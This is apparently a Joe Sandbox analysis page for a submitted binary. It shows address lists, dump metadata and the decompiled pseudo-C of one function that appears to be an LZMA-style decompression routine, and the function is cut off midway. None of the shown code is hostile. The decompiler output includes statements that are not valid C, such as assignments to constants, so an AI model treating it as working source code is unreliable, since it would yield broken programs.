0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
